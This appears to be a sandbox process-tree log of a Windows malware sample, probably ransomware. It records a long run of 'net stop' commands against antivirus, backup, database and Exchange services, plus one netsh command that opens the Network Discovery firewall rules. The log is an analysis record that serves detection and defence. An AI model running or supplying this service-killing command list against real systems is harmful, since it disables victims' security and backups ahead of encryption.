C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McShield /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfemms /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL80 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McTaskManager /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RESvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop OracleClientCache80 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfevtp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SepMasterService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ShMonitor /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sacsvr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Smcinst /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVAdminService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SmcService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQL Backups /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SntpService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_filter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophossps /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SamSs /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer110 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop POP3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop svcGenericHost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update_64 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop IISAdmin /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TmCCSF /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SMTPSvc /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeES /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop WRSVC /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop tmlisten /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msftesql$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop vapiendpoint /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKey /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SstpSvc /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AVP /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop UI0Detect /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DCAgent /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
